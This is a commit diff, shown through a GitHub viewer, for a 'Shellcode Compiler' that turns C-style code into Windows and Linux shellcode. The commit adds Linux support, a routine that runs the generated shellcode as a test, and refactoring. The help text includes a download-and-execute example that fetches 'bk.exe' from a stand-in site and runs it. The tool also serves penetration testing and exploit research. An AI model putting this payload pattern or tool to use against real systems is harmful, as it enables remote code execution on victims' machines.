| FazBrowse GitHub Viewer | Trending | | Home |
| Tools: [Download Repo ZIP] [Original HTTPS Page] |
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -3,7 +3,7 @@ | |||
| 3 | 3 | ||
| 4 | 4 | // Program version | |
| 5 | 5 | ||
| 6 | - #define PROGRAM_VERSION "v0.2 Alpha" | ||
| 6 | + #define PROGRAM_VERSION "v2.0 Alpha" | ||
| 7 | 7 | ||
| 8 | 8 | // Global variable for command line arguments | |
| 9 | 9 | ||
@@ -33,13 +33,14 @@ void CommandLine::PrintHelp(string p_sFile) | |||
| 33 | 33 | cout << "NytroSecurity [ nytrosecurity.com ]" << endl << endl; | |
| 34 | 34 | ||
| 35 | 35 | cout << "Program description" << endl; | |
| 36 | - cout << "-------------------" << endl; | ||
| 37 | - cout << "\tShellcode Compiler is a program that compiles C/C++ style code " << endl; | ||
| 38 | - cout << "into a small, position-independent and NULL-free shellcode for Windows." << endl; | ||
| 39 | - cout << "It is possible to call any Windows API function in a user-friendly way." << endl << endl; | ||
| 36 | + cout << "-------------------" << endl << endl; | ||
| 37 | + cout << "\tShellcode Compiler is a program that compiles C/C++ style code into a small, " << endl; | ||
| 38 | + cout << "\tposition-independent and NULL-free shellcode for Windows (x86 and x64) and " << endl; | ||
| 39 | + cout << "\tLinux(x86 and x64). It is possible to call any Windows API function or Linux " << endl; | ||
| 40 | + cout << "\tsyscall in a user - friendly way. " << endl << endl; | ||
| 40 | 41 | ||
| 41 | 42 | cout << "Command line options " << endl; | |
| 42 | - cout << "--------------------" << endl; | ||
| 43 | + cout << "--------------------" << endl << endl; | ||
| 43 | 44 | cout << "\t-h (--help) : Show this help message" << endl; | |
| 44 | 45 | cout << "\t-p (--platform) : Shellcode platform: win_x86,win_x64,linux_x86,linux_x64" << endl; | |
| 45 | 46 | cout << "\t-v (--verbose) : Print detailed output" << endl; | |
@@ -48,18 +49,27 @@ void CommandLine::PrintHelp(string p_sFile) | |||
| 48 | 49 | cout << "\t-o (--output) : Output file of the generated binary shellcode" << endl; | |
| 49 | 50 | cout << "\t-a (--assembbly) : Output file of the generated assembly code" << endl << endl; | |
| 50 | 51 | ||
| 51 | - cout << "Source code example" << endl; | ||
| 52 | - cout << "-------------------" << endl << endl; | ||
| 52 | + cout << "Windows example" << endl; | ||
| 53 | + cout << "---------------" << endl << endl; | ||
| 53 | 54 | cout << "\tfunction URLDownloadToFileA(\"urlmon.dll\");" << endl; | |
| 54 | 55 | cout << "\tfunction WinExec(\"kernel32.dll\");" << endl; | |
| 55 | 56 | cout << "\tfunction ExitProcess(\"kernel32.dll\");" << endl << endl; | |
| 56 | 57 | cout << "\tURLDownloadToFileA(0,\"https://site.com/bk.exe\",\"bk.exe\",0,0);" << endl; | |
| 57 | 58 | cout << "\tWinExec(\"bk.exe\",0);" << endl; | |
| 58 | 59 | cout << "\tExitProcess(0);" << endl << endl; | |
| 59 | 60 | ||
| 61 | + cout << "Linux example" << endl; | ||
| 62 | + cout << "-------------" << endl << endl; | ||
| 63 | + cout << "\tchmod(\"/root/chmodme\", 511);" << endl; | ||
| 64 | + cout << "\twrite(1, \"Hello, world\", 12);" << endl; | ||
| 65 | + cout << "\tkill(1661, 9);" << endl; | ||
| 66 | + cout << "\tgetpid();" << endl; | ||
| 67 | + cout << "\texecve(\"/usr/bin/burpsuite\", 0, 0);" << endl; | ||
| 68 | + cout << "\texit(2" << endl << endl; | ||
| 69 | + | ||
| 60 | 70 | cout << "Invocation example" << endl; | |
| 61 | - cout << "------------------" << endl; | ||
| 62 | - cout << "\t" << p_sFile << " -r Source.txt -o Shellcode.bin -a Assembly.asm" << endl; | ||
| 71 | + cout << "------------------" << endl << endl; | ||
| 72 | + cout << "\t" << p_sFile << " -p windows_x64 -r Source.txt -o Shellcode.bin -a Assembly.asm" << endl << endl; | ||
| 63 | 73 | } | |
| 64 | 74 | ||
| 65 | 75 | // Parse command line arguments | |
@@ -165,33 +175,29 @@ void CommandLine::ParseCommandLine(int argc, char *argv[]) | |||
| 165 | 175 | ||
| 166 | 176 | if (g_bVerbose) DebugUtils::DumpAllData(); | |
| 167 | 177 | ||
| 178 | + // Compile all data | ||
| 179 | + | ||
| 180 | + string sASMOutput = Compile::CompileAllData(); | ||
| 181 | + | ||
| 168 | 182 | // Output ASM file | |
| 169 | 183 | ||
| 170 | 184 | if (g_bASMFile) | |
| 171 | 185 | { | |
| 172 | 186 | if (Utils::FileExists(g_sASMFile)) Utils::DeleteSourceFile(g_sASMFile); | |
| 173 | - Compile::CompileAllData(g_sASMFile); | ||
| 174 | - } | ||
| 175 | - else | ||
| 176 | - { | ||
| 177 | - string sFile = Utils::GetTemp(); | ||
| 178 | - sFile += "\\SC.asm"; | ||
| 179 | - g_sASMFile = sFile; | ||
| 180 | - if (Utils::FileExists(g_sASMFile)) Utils::DeleteSourceFile(g_sASMFile); | ||
| 181 | - Compile::CompileAllData(sFile); | ||
| 187 | + Utils::WriteToFile(g_sASMFile, sASMOutput); | ||
| 182 | 188 | } | |
| 183 | 189 | ||
| 184 | 190 | // Output file | |
| 185 | 191 | ||
| 186 | 192 | if (!g_bOutputFile) | |
| 187 | - g_sOutputFile = "SC2.bin"; | ||
| 193 | + g_sOutputFile = "Shellcode.bin"; | ||
| 188 | 194 | ||
| 189 | 195 | if (Utils::FileExists(g_sOutputFile)) Utils::DeleteSourceFile(g_sOutputFile); | |
| 190 | 196 | ||
| 191 | 197 | // Compile using Keystone engine | |
| 192 | 198 | ||
| 193 | 199 | size_t nAssembledSize = 0; | |
| 194 | - unsigned char *pcAssembled = KeystoneLib::Assemble(&nAssembledSize, Utils::ReadSourceFile(g_sASMFile)); | ||
| 200 | + unsigned char *pcAssembled = KeystoneLib::Assemble(&nAssembledSize, sASMOutput); | ||
| 195 | 201 | ||
| 196 | 202 | if (nAssembledSize == 0) | |
| 197 | 203 | { | |
@@ -214,7 +220,14 @@ void CommandLine::ParseCommandLine(int argc, char *argv[]) | |||
| 214 | 220 | if (g_bTest) | |
| 215 | 221 | { | |
| 216 | 222 | cout << endl << "Testing shellcode..." << endl; | |
| 217 | - Sleep(3000); | ||
| 223 | + | ||
| 224 | + // Cross platform sleeping (be sure output file is written) | ||
| 225 | + | ||
| 226 | + #if defined(_WIN32) | ||
| 227 | + Sleep(1000); | ||
| 228 | + #else | ||
| 229 | + sleep(1); | ||
| 230 | + #endif | ||
| 218 | 231 | DebugUtils::TestShellcode(g_sOutputFile); | |
| 219 | 232 | } | |
| 220 | 233 | } | |
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -5,6 +5,12 @@ | |||
| 5 | 5 | #include <string> | |
| 6 | 6 | #include <iostream> | |
| 7 | 7 | ||
| 8 | + #if defined(_WIN32) | ||
| 9 | + #include <Windows.h> | ||
| 10 | + #else | ||
| 11 | + #include <unistd.h> | ||
| 12 | + #endif | ||
| 13 | + | ||
| 8 | 14 | #include "Utils.h" | |
| 9 | 15 | #include "Compile.h" | |
| 10 | 16 | #include "DebugUtils.h" | |
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -141,8 +141,10 @@ bool Compile::ParseFile(string p_sFileData) | |||
| 141 | 141 | ||
| 142 | 142 | // Compile all parsed data into ASM file | |
| 143 | 143 | ||
| 144 | - void Compile::CompileAllData(string p_sOutput) | ||
| 144 | + string Compile::CompileAllData() | ||
| 145 | 145 | { | |
| 146 | + string sOutput = ""; | ||
| 147 | + | ||
| 146 | 148 | // Compile for Windows | |
| 147 | 149 | ||
| 148 | 150 | if (Platform::GetPlatform() == PLATFORM_TYPE_LINUX_X86 || Platform::GetPlatform() == PLATFORM_TYPE_LINUX_X64) | |
@@ -151,32 +153,34 @@ void Compile::CompileAllData(string p_sOutput) | |||
| 151 | 153 | ||
| 152 | 154 | for (size_t i = 0; i < FunctionCalls::AllFunctionCalls.size(); i++) | |
| 153 | 155 | { | |
| 154 | - Utils::WriteToFile(p_sOutput, FunctionCalls::GenerateFunctionCall(FunctionCalls::AllFunctionCalls[i])); | ||
| 156 | + sOutput += FunctionCalls::GenerateFunctionCall(FunctionCalls::AllFunctionCalls[i]); | ||
| 155 | 157 | } | |
| 156 | 158 | } | |
| 157 | 159 | else | |
| 158 | 160 | { | |
| 159 | - Utils::WriteToFile(p_sOutput, ASMHeader::GetASMHeader()); | ||
| 161 | + sOutput += ASMHeader::GetASMHeader(); | ||
| 160 | 162 | ||
| 161 | 163 | // Generate LoadLibrary for all DLLs (from declared functions) | |
| 162 | 164 | ||
| 163 | 165 | for (size_t i = 0; i < DeclaredFunctions::AllDeclaredFunctions.size(); i++) | |
| 164 | 166 | { | |
| 165 | - Utils::WriteToFile(p_sOutput, DeclaredFunctions::GenerateLoadLibraryCall(DeclaredFunctions::AllDeclaredFunctions[i].DLL)); | ||
| 167 | + sOutput += DeclaredFunctions::GenerateLoadLibraryCall(DeclaredFunctions::AllDeclaredFunctions[i].DLL); | ||
| 166 | 168 | } | |
| 167 | 169 | ||
| 168 | 170 | // Generate GetProcAddress for all declared functions | |
| 169 | 171 | ||
| 170 | 172 | for (size_t i = 0; i < DeclaredFunctions::AllDeclaredFunctions.size(); i++) | |
| 171 | 173 | { | |
| 172 | - Utils::WriteToFile(p_sOutput, DeclaredFunctions::GenerateGetProcAddressCall(DeclaredFunctions::AllDeclaredFunctions[i].DLL, DeclaredFunctions::AllDeclaredFunctions[i].Name)); | ||
| 174 | + sOutput += DeclaredFunctions::GenerateGetProcAddressCall(DeclaredFunctions::AllDeclaredFunctions[i].DLL, DeclaredFunctions::AllDeclaredFunctions[i].Name); | ||
| 173 | 175 | } | |
| 174 | 176 | ||
| 175 | 177 | // Generate function calls for all function calls | |
| 176 | 178 | ||
| 177 | 179 | for (size_t i = 0; i < FunctionCalls::AllFunctionCalls.size(); i++) | |
| 178 | 180 | { | |
| 179 | - Utils::WriteToFile(p_sOutput, FunctionCalls::GenerateFunctionCall(FunctionCalls::AllFunctionCalls[i])); | ||
| 181 | + sOutput += FunctionCalls::GenerateFunctionCall(FunctionCalls::AllFunctionCalls[i]); | ||
| 180 | 182 | } | |
| 181 | 183 | } | |
| 184 | + | ||
| 185 | + return sOutput; | ||
| 182 | 186 | } | |
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -25,9 +25,9 @@ class Compile | |||
| 25 | 25 | ||
| 26 | 26 | static bool ParseFile(string p_sFileData); | |
| 27 | 27 | ||
| 28 | - // Compile all parsed data into ASM file | ||
| 28 | + // Compile all parsed data into ASM string | ||
| 29 | 29 | ||
| 30 | - static void CompileAllData(string p_sOutput); | ||
| 30 | + static string CompileAllData(); | ||
| 31 | 31 | }; | |
| 32 | 32 | ||
| 33 | 33 | #endif | |
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -1,6 +1,13 @@ | |||
| 1 | 1 | ||
| 2 | 2 | #include "DebugUtils.h" | |
| 3 | - #include "SEHUtils.h" | ||
| 3 | + | ||
| 4 | + #if defined(_WIN32) | ||
| 5 | + #include "SEHUtils.h" | ||
| 6 | + #else | ||
| 7 | + #include <cstdlib> | ||
| 8 | + #include <cstring> | ||
| 9 | + #include <sys/mman.h> | ||
| 10 | + #endif | ||
| 4 | 11 | ||
| 5 | 12 | // Dump all data - debug purposes | |
| 6 | 13 | ||
@@ -43,6 +50,8 @@ void DebugUtils::TestShellcode(string p_sFilename) | |||
| 43 | 50 | return; | |
| 44 | 51 | } | |
| 45 | 52 | ||
| 53 | + #if defined(_WIN32) | ||
| 54 | + | ||
| 46 | 55 | // Get space for shellcode | |
| 47 | 56 | ||
| 48 | 57 | void *sc = VirtualAlloc(0, size, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE); | |
@@ -65,5 +74,23 @@ void DebugUtils::TestShellcode(string p_sFilename) | |||
| 65 | 74 | cout << "Error when executing shellcode: " | |
| 66 | 75 | << e.what() << endl; | |
| 67 | 76 | } | |
| 77 | + | ||
| 78 | + #else | ||
| 79 | + | ||
| 80 | + // Test shellcode on Linux | ||
| 81 | + | ||
| 82 | + unsigned char *sc = (unsigned char*)valloc(size); | ||
| 83 | + | ||
| 84 | + if (sc == NULL) | ||
| 85 | + { | ||
| 86 | + cout << "Error: Cannot allocate space for shellcode!" << endl; | ||
| 87 | + return; | ||
| 88 | + } | ||
| 89 | + | ||
| 90 | + memcpy(sc, p, size); | ||
| 91 | + mprotect(sc, size, PROT_READ | PROT_EXEC); | ||
| 92 | + (*(int(*)())sc)(); | ||
| 93 | + | ||
| 94 | + #endif | ||
| 68 | 95 | } | |
| 69 | 96 | ||
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -3,6 +3,7 @@ | |||
| 3 | 3 | ||
| 4 | 4 | #include <string> | |
| 5 | 5 | #include <iostream> | |
| 6 | + #include <cstring> | ||
| 6 | 7 | ||
| 7 | 8 | #include "Platform.h" | |
| 8 | 9 | ||
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -1,35 +1,24 @@ | |||
| 1 | 1 | ||
| 2 | 2 | #include "Utils.h" | |
| 3 | 3 | ||
| 4 | - // Get current working directory | ||
| 5 | - | ||
| 6 | - string Utils::GetCurrentDir() | ||
| 7 | - { | ||
| 8 | - char buffer[1024]; | ||
| 9 | - string sContent = ""; | ||
| 10 | - | ||
| 11 | - DWORD r = GetCurrentDirectory(1024, buffer); | ||
| 12 | - | ||
| 13 | - if (r == 0) return ""; | ||
| 14 | - sContent = buffer; | ||
| 15 | - | ||
| 16 | - return sContent; | ||
| 17 | - } | ||
| 18 | - | ||
| 19 | 4 | // Check if a file exists | |
| 20 | 5 | ||
| 21 | 6 | bool Utils::FileExists(string p_sPath) | |
| 22 | 7 | { | |
| 23 | - DWORD dwAttrib = GetFileAttributes(p_sPath.c_str()); | ||
| 24 | - | ||
| 25 | - return (dwAttrib != INVALID_FILE_ATTRIBUTES); | ||
| 8 | + if (FILE * file = fopen(p_sPath.c_str(), "r")) { | ||
| 9 | + fclose(file); | ||
| 10 | + return true; | ||
| 11 | + } | ||
| 12 | + else { | ||
| 13 | + return false; | ||
| 14 | + } | ||
| 26 | 15 | } | |
| 27 | 16 | ||
| 28 | 17 | // Delete a file | |
| 29 | 18 | ||
| 30 | 19 | bool Utils::DeleteSourceFile(string p_sFile) | |
| 31 | 20 | { | |
| 32 | - return (bool)DeleteFile(p_sFile.c_str()); | ||
| 21 | + return (bool)remove(p_sFile.c_str()); | ||
| 33 | 22 | } | |
| 34 | 23 | ||
| 35 | 24 | // Function used to read a file | |
@@ -179,21 +168,6 @@ bool Utils::IsString(char p_cCharacter) | |||
| 179 | 168 | p_cCharacter != '"' && p_cCharacter != ')' && p_cCharacter != '(' && p_cCharacter != ','); | |
| 180 | 169 | } | |
| 181 | 170 | ||
| 182 | - // Get TEMP folder | ||
| 183 | - | ||
| 184 | - string Utils::GetTemp() | ||
| 185 | - { | ||
| 186 | - char buffer[1024]; | ||
| 187 | - string sContent = ""; | ||
| 188 | - | ||
| 189 | - DWORD r = GetTempPath(1024, buffer); | ||
| 190 | - | ||
| 191 | - if (r == 0) return ""; | ||
| 192 | - sContent = buffer; | ||
| 193 | - | ||
| 194 | - return sContent; | ||
| 195 | - } | ||
| 196 | - | ||
| 197 | 171 | // Function to convert a string to lower | |
| 198 | 172 | ||
| 199 | 173 | string Utils::ToLower(string p_sString) | |
| Original file line number | Diff line number | Diff line change | |
|---|---|---|---|
@@ -4,7 +4,7 @@ | |||
| 4 | 4 | ||
| 5 | 5 | #define _CRT_SECURE_NO_WARNINGS | |
| 6 | 6 | ||
| 7 | - #include <Windows.h> | ||
| 7 | + #include <cstdio> | ||
| 8 | 8 | #include <string> | |
| 9 | 9 | #include <iostream> | |
| 10 | 10 | #include <sstream> | |
@@ -19,7 +19,6 @@ class Utils | |||
| 19 | 19 | ||
| 20 | 20 | // All utilities | |
| 21 | 21 | ||
| 22 | - static string GetCurrentDir(); | ||
| 23 | 22 | static bool FileExists(string p_sPath); | |
| 24 | 23 | static bool DeleteSourceFile(string p_sFile); | |
| 25 | 24 | static string ReadSourceFile(string p_sFilename); | |
@@ -30,7 +29,6 @@ class Utils | |||
| 30 | 29 | static string CharToHexString(char p_cChar); | |
| 31 | 30 | static string IntToHexString(size_t p_iNumber); | |
| 32 | 31 | static bool IsString(char p_cCharacter); | |
| 33 | - static string GetTemp(); | ||
| 34 | 32 | static string ToLower(string p_sString); | |
| 35 | 33 | }; | |
| 36 | 34 | ||
| Back | FazBrowse Home | New Git URL |
0 commit comments